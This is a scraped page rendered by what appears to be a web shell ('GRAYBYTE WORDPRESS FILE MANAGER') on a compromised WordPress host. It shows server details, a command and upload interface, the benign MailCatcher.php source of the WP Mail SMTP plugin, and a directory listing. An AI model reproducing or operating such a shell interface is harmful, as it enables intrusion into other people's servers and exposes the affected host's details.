GRAYBYTE WORDPRESS FILE MANAGER9060

Server IP : 198.54.121.189 / Your IP : 216.73.216.140
System : Linux premium69.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
PHP Version : 7.4.33
Disable Function : NONE
cURL : ON | WGET : ON | Sudo : OFF | Pkexec : OFF
Directory : /home/giriqfky/chahida.co.in/wp-content/plugins/wp-mail-smtp/src/
Upload Files :
Current_dir [ Writeable ] Document_root [ Writeable ]

Command :


Current File : /home/giriqfky/chahida.co.in/wp-content/plugins/wp-mail-smtp/src//MailCatcher.php
<?php

namespace WPMailSMTP;

use phpmailerException;

// Load PHPMailer class, so we can subclass it.
if ( ! class_exists( 'PHPMailer', false ) ) {
	require_once ABSPATH . WPINC . '/class-phpmailer.php';
}

/**
 * Class MailCatcher replaces the \PHPMailer and modifies the email sending logic.
 * Thus, we can use other mailers API to do what we need, or stop emails completely.
 *
 * @since 1.0.0
 */
class MailCatcher extends \PHPMailer implements MailCatcherInterface {

	use MailCatcherTrait;

	/**
	 * Callback Action function name.
	 *
	 * The function that handles the result of the send email action.
	 * It is called out by send() for each email sent.
	 *
	 * @since 1.3.0
	 *
	 * @var string
	 */
	public $action_function = '\WPMailSMTP\Processor::send_callback';

	/**
	 * Returns all custom headers.
	 * In older versions of \PHPMailer class this method didn't exist.
	 * As we support WordPress 3.6+ - we need to make sure this method is always present.
	 *
	 * @since 1.5.0
	 *
	 * @return array
	 */
	public function getCustomHeaders() {

		return $this->CustomHeader; // phpcs:ignore WordPress.NamingConventions.ValidVariableName.UsedPropertyNotSnakeCase
	}

	/**
	 * Get the PHPMailer line ending.
	 *
	 * @since 2.2.0
	 *
	 * @return string
	 */
	public function get_line_ending() {

		return $this->LE; // phpcs:ignore WordPress.NamingConventions.ValidVariableName.UsedPropertyNotSnakeCase
	}

	/**
	 * Throw PHPMailer exception.
	 *
	 * @since 4.0.0
	 *
	 * @param string $error Error message.
	 *
	 * @throws phpmailerException PHPMailer exception.
	 */
	protected function throw_exception( $error ) {

		throw new phpmailerException( $error );
	}
}

[ Back ]
Name
Size
Last Modified
Owner / Group
Permissions
Options
..
--
July 10 2025 04:32:25
giriqfky / giriqfky
0755
Admin
--
July 10 2025 04:32:25
giriqfky / giriqfky
0755
Compatibility
--
July 10 2025 04:32:25
giriqfky / giriqfky
0755
Helpers
--
July 10 2025 04:32:25
giriqfky / giriqfky
0755
Providers
--
July 10 2025 04:32:25
giriqfky / giriqfky
0755
Queue
--
July 10 2025 04:32:25
giriqfky / giriqfky
0755
Reports
--
July 10 2025 04:32:25
giriqfky / giriqfky
0755
Tasks
--
July 10 2025 04:32:25
giriqfky / giriqfky
0755
UsageTracking
--
July 10 2025 04:32:25
giriqfky / giriqfky
0755
.htaccess
0.41 KB
July 10 2025 04:32:25
giriqfky / giriqfky
0644
AbstractConnection.php
1.09 KB
June 05 2025 17:33:30
giriqfky / giriqfky
0644
Conflicts.php
15.015 KB
June 05 2025 17:33:30
giriqfky / giriqfky
0644
Connect.php
9.184 KB
June 05 2025 17:33:30
giriqfky / giriqfky
0644
Connection.php
0.941 KB
June 05 2025 17:33:30
giriqfky / giriqfky
0644
ConnectionInterface.php
1.014 KB
June 05 2025 17:33:30
giriqfky / giriqfky
0644
ConnectionsManager.php
0.747 KB
June 05 2025 17:33:30
giriqfky / giriqfky
0644
Core.php
33.451 KB
June 05 2025 17:33:30
giriqfky / giriqfky
0644
DBRepair.php
6.286 KB
June 05 2025 17:33:30
giriqfky / giriqfky
0644
Debug.php
3.497 KB
June 05 2025 17:33:30
giriqfky / giriqfky
0644
Geo.php
6.758 KB
June 05 2025 17:33:30
giriqfky / giriqfky
0644
MailCatcher.php
1.633 KB
June 05 2025 17:33:30
giriqfky / giriqfky
0644
MailCatcherInterface.php
1.157 KB
June 05 2025 17:33:30
giriqfky / giriqfky
0644
MailCatcherTrait.php
13.429 KB
June 05 2025 17:33:30
giriqfky / giriqfky
0644
MailCatcherV6.php
1.474 KB
June 05 2025 17:33:30
giriqfky / giriqfky
0644
Migration.php
12.107 KB
June 05 2025 17:33:30
giriqfky / giriqfky
0644
MigrationAbstract.php
3.211 KB
June 05 2025 17:33:30
giriqfky / giriqfky
0644
Migrations.php
3.592 KB
June 05 2025 17:33:30
giriqfky / giriqfky
0644
OptimizedEmailSending.php
1.167 KB
June 05 2025 17:33:30
giriqfky / giriqfky
0644
Options.php
46.444 KB
June 05 2025 17:33:30
giriqfky / giriqfky
0644
Processor.php
14.063 KB
June 05 2025 17:33:30
giriqfky / giriqfky
0644
SiteHealth.php
12.63 KB
June 05 2025 17:33:30
giriqfky / giriqfky
0644
Upgrade.php
1.55 KB
June 05 2025 17:33:30
giriqfky / giriqfky
0644
Uploads.php
5.436 KB
June 05 2025 17:33:30
giriqfky / giriqfky
0644
WP.php
20.078 KB
June 05 2025 17:33:30
giriqfky / giriqfky
0644
WPMailArgs.php
4.442 KB
June 05 2025 17:33:30
giriqfky / giriqfky
0644
WPMailInitiator.php
4.38 KB
June 05 2025 17:33:30
giriqfky / giriqfky
0644

GRAYBYTE WORDPRESS FILE MANAGER @ 2025
CONTACT ME
Static GIF